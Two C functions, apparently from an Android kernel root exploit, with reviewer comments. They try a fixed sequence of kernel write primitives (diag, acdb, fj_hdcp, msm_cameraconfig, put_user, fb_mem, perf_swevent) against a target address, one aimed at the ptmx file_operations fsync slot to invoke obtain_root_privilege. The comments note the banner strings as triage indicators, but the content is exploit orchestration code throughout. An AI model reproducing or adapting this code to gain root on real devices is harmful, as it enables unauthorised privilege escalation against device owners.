Example #1
/*
 * Try three kernel write primitives, in a fixed order, against one target
 * address, stopping at the first that reports success.
 *
 * The target is the value returned by get_ptmx_fops_address() plus 0x38.
 * Going by the original local's name (ptmx_fsync_address) this is presumably
 * the fsync slot of the ptmx file_operations table -- confirm against the
 * kernel build in question, because a hard-coded offset only holds for one
 * struct layout.
 *
 * NOTE(review): the technique appears to depend on that slot being writable
 * through the primitives below; a kernel that keeps its ops tables in
 * read-only memory would presumably defeat it -- confirm.
 *
 * The progress strings printed here are fixed literals, which makes them
 * usable as static indicators when triaging a binary built from this code.
 *
 * Returns false if the table address could not be resolved, true as soon as
 * the diag or acdb attempt succeeds, and otherwise whatever the perf_swevent
 * attempt returns.
 */
static bool
run_exploit(void)
{
  const unsigned long int fops_base = get_ptmx_fops_address();
  unsigned long int target;

  /* Without the table address there is nothing to aim at. */
  if (fops_base == 0) {
    return false;
  }

  target = fops_base + 0x38;

  /* First attempt; unlike the other two it prints no banner of its own. */
  if (attempt_diag_exploit(target)) {
    return true;
  }
  printf("\n");

  printf("Attempt acdb exploit...\n");
  if (attempt_acdb_exploit(target, 0)) {
    return true;
  }
  printf("\n");

  /*
   * Last resort: its result is returned as-is.
   * NOTE(review): (int)&obtain_root_privilege narrows a pointer to int, so
   * the value only survives intact where pointers are no wider than int.
   */
  printf("Attempt perf_swevent exploit...\n");
  return perf_swevent_run_exploit(target, (int)&obtain_root_privilege,
                                  run_obtain_root_privilege, NULL);
}
Example #2
/**
 * Walk a fixed list of kernel write primitives until one reports that it ran.
 *
 * @param address        target address, handed unchanged to every primitive
 * @param write_value    value handed to every primitive (by its name, the
 *                       value to be written at @p address)
 * @param restore_value  handed to every primitive except perf_swevent and
 *                       diag; presumably the original value to put back
 *                       afterwards -- confirm against the callees
 * @param callback_func  stored in the shared callback record
 * @param callback_param stored alongside @p callback_func
 *
 * @return the record's result field from the first primitive that returns
 *         non-zero, or false if none of them does. The record starts out as
 *         false, so a primitive can report that it ran while the overall
 *         result is still false; the field is presumably set by the callback
 *         path (run_callback) -- confirm.
 *
 * The banner strings are fixed literals and so double as static indicators
 * when triaging a binary built from this code.
 */
bool
attempt_exploit(unsigned long int address,
                unsigned long int write_value,
                unsigned long int restore_value,
                exploit_callback_t callback_func,
                void *callback_param)
{
  callback_info_t ctx;

  ctx.result = false;
  ctx.func = callback_func;
  ctx.param = callback_param;

  /* Order is the author's "most stable first" ranking; keep it as is. */

  printf("Attempt acdb exploit...\n");
  if (attempt_acdb_exploit(address, write_value, restore_value, &ctx)) {
    goto done;
  }
  printf("\n");

  printf("Attempt fj_hdcp exploit...\n");
  if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &ctx)) {
    goto done;
  }
  printf("\n");

  printf("Attempt msm_cameraconfig exploit...\n");
  if (attempt_msm_cameraconfig_exploit(address, write_value, restore_value, &ctx)) {
    goto done;
  }
  printf("\n");

  printf("Attempt put_user exploit...\n");
  if (attempt_put_user_exploit(address, write_value, restore_value, &ctx)) {
    goto done;
  }
  printf("\n");

  printf("Attempt fb_mem exploit...\n");
  if (attempt_fb_mem_exploit(address, write_value, restore_value, &ctx)) {
    goto done;
  }
  printf("\n");

  /* perf_swevent takes the run_callback trampoline and no restore value. */
  printf("Attempt perf_swevent exploit...\n");
  if (perf_swevent_run_exploit(address, write_value, &run_callback, &ctx)) {
    goto done;
  }
  printf("\n");

  /* diag is tried last, without a banner and without a restore value. */
  if (attempt_diag_exploit(address, write_value, &ctx)) {
    goto done;
  }

  return false;

done:
  /* Report what the callback recorded, not merely that a primitive ran. */
  return ctx.result;
}